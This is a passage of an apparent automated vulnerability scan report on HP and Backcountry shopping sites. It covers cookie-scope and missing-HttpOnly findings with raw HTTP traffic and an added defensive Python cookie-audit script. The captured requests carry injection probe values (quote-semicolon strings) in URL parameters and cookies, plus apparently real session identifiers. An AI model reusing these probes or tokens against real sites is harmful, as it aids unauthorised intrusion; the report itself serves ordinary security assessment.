jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x5x34; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Ahome%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:05 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksi9Ge2gh4NinvvVvZdgWa0ic%3D&s1=xss+printer; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcomsh_usen=s1=xss+printer&s1_context=hhostore&s2_context=hpcomsearch&s2=xss; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hho_omni_usen=window.hpmetrics.isearch%3D%7B%27search_term%27%3A%27xss+printer%27%2C%27search_referrer%27%3A%27home%27%2C%27searchtype%27%3A%27search_noresults_keyword%27%2C%27sort%27%3A%27most_popular%27%2C%27numrecords%27%3A0%2C%27numchosen%27%3A0%2C%27resultset%27%3A0%2C%27refinepath%27%3A%27%27%2C%27correct%27%3A0%2C%27suggest%27%3A%27%27%2C%27search_platform%27%3A%27EA%27%2C%27searchresultpage%27%3Atrue%2C%27searchrefine%27%3Afalse%7D; domain=.hp.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1867


<html>
<body>

<!-- SiteCatalyst code version: F.3.
Copyright 2006 Omniture, Inc. More info available at
http://www.omniture.com Testing -->
<s
...[SNIP]...
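The check behind each of the findings above, written out as an added example (this is not code from the XSS.CX report or from the scanner that produced it): parse the Set-Cookie headers of a response, flag any whose Domain attribute names a parent of the host that issued them, and apply a rough session-token heuristic before deciding how much the finding matters. The four headers are re-typed from the 3.17 search_request.do response with their expires attributes dropped; the session-token heuristic (session-like name, or a decoded value that is one long high-entropy blob with no key=value or JSON structure) is this example's assumption, not the scanner's rule; the HHOJSID Set-Cookie line used in the test is constructed, since the page only shows HHOJSID arriving in request Cookie headers and URL paths.

```python
"""Parent-domain cookie scope check (added example, not from the report)."""
import math
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote_plus

# Host that sent the response in finding 3.17.
ISSUING_HOST = "www.shopping.hp.com"

# Re-typed from the 3.17 response above; expires attributes omitted.
SET_COOKIE_HEADERS = [
    "hpshopping=1&user_id=mlksi9Ge2gh4NinvvVvZdgWa0ic%3D&s1=xss+printer; path=/",
    "hpcompc_usen=cartExists=false; domain=.hp.com; path=/",
    "hpcomsh_usen=s1=xss+printer&s1_context=hhostore&s2_context=hpcomsearch&s2=xss; domain=.hp.com; path=/",
    "hho_omni_usen=window.hpmetrics.isearch%3D%7B%27search_term%27%3A%27xss+printer%27%2C%27search_referrer%27%3A%27home%27%2C%27searchtype%27%3A%27search_noresults_keyword%27%2C%27sort%27%3A%27most_popular%27%2C%27numrecords%27%3A0%2C%27numchosen%27%3A0%2C%27resultset%27%3A0%2C%27refinepath%27%3A%27%27%2C%27correct%27%3A0%2C%27suggest%27%3A%27%27%2C%27search_platform%27%3A%27EA%27%2C%27searchresultpage%27%3Atrue%2C%27searchrefine%27%3Afalse%7D; domain=.hp.com; path=/",
]


@dataclass
class Cookie:
    name: str
    value: str
    domain: Optional[str] = None  # Domain attribute, lower-cased, leading dot stripped
    path: str = "/"
    secure: bool = False
    httponly: bool = False


def parse_set_cookie(header: str) -> Cookie:
    """Split one Set-Cookie header value into name, value and attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    c = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        k, _, v = attr.partition("=")
        k, v = k.strip().lower(), v.strip()
        if k == "domain":
            c.domain = v.lstrip(".").lower()
        elif k == "path":
            c.path = v or "/"
        elif k == "secure":
            c.secure = True
        elif k == "httponly":
            c.httponly = True
    return c


def domain_matches(cookie_domain: str, host: str) -> bool:
    """RFC 6265 domain matching: host is the domain itself or a subdomain of it."""
    host = host.lower()
    return host == cookie_domain or host.endswith("." + cookie_domain)


def is_parent_scoped(c: Cookie, issuing_host: str) -> bool:
    """True when Domain names a proper parent of the host that set the cookie."""
    if c.domain is None:  # no Domain attribute: host-only cookie
        return False
    return issuing_host.lower() != c.domain and domain_matches(c.domain, issuing_host)


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    n = len(s)
    return -sum(s.count(ch) / n * math.log2(s.count(ch) / n) for ch in set(s)) if n else 0.0


# Heuristic (assumption of this example): session-like names, or an opaque
# high-entropy value with none of the characters a key=value or JSON blob uses.
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.I)
STRUCTURAL = set("=&{}[]:,'\" \t")


def looks_like_session_token(c: Cookie) -> bool:
    if SESSION_NAME_RE.search(c.name):
        return True
    decoded = unquote_plus(c.value)
    if len(decoded) < 16 or any(ch in STRUCTURAL for ch in decoded):
        return False
    return shannon_entropy(decoded) > 3.5


def audit(issuing_host: str, headers: List[str]) -> List[dict]:
    """Return one finding per cookie whose scope widens to a parent domain."""
    findings = []
    for h in headers:
        c = parse_set_cookie(h)
        if is_parent_scoped(c, issuing_host):
            findings.append({
                "name": c.name,
                "domain": c.domain,
                "session_like": looks_like_session_token(c),
                "secure": c.secure,
                "httponly": c.httponly,
            })
    return findings


if __name__ == "__main__":
    for f in audit(ISSUING_HOST, SET_COOKIE_HEADERS):
        print(f)
```

Run against the 3.17 headers, `audit` reports hpcompc_usen, hpcomsh_usen and hho_omni_usen as parent-scoped and none as session-like, which is the scanner's conclusion; hpshopping carries no Domain attribute and stays host-only. `domain_matches` also shows why the scope matters: a Domain=.hp.com cookie is sent to every hp.com host, including the h71036.www7.hp.com host visible in the s_sq cookie above, so any of those hosts can read or overwrite it.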

3.18. http://www.shopping.hp.com/webapp/shopping/series_can.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/series_can.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; 
ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fseries_can.do_storeName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-On_5%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 168108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.19. http://www.shopping.hp.com/webapp/shopping/store_access.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; 
s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:00:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjg92V0Q14NS%2FivlvfcASe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4. Cookie without HttpOnly flag set
There are 77 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.backcountry.com/mens-clothing

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /mens-clothing

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mens-clothing HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/store/user.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; shipping_selection=FREE; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; siec=false; affiliate_reference_id=R999; tr_template=; promo_nav=; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%2C%5B%27Direct%2520Load%27%2C%271316711656080%27%5D%5D; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713456784; c49=Customer%20Login; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DCustomer%252520Login%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/mens-clothing%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Moovweb-Pagetype: CATEGORY
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 104410
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:34 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:33 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:33 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:34 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...

4.2. http://www.backcountry.com/store/BCS0021

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/BCS0021

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/BCS0021 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mt.v=1.346469883.1316711542790; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; rdv_test_group=1; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; s_sq=%5B%5BB%5D%5D; utag=session_id:1316711948944$_session:1316713377068; c49=PDP%3ABackcountry.com%20Gift%20Certificate; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Location: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:39 GMT
Set-Cookie: RES_SESSIONID=256475435893179; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:39 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:39 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:39 GMT


4.3. http://www.backcountry.com/store/PRA0870/Bliss-Capri-Pant-Womens.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/PRA0870/Bliss-Capri-Pant-Womens.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/PRA0870/Bliss-Capri-Pant-Womens.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-capri-pants
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1; __utmx=248652180.; __utmxx=248652180.

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Location: http://www.backcountry.com/prana-bliss-capri-pant-womens
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:22 GMT
Set-Cookie: RES_TRACKINGID=841292264887481; path=/; domain=backcountry.com; expires=Tue, 21-Sep-2021 22:11:21 GMT
Set-Cookie: RES_SESSIONID=253168360320593; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:21 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT


4.4. http://www.backcountry.com/store/cart/add.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/cart/add.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=61&y=13 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
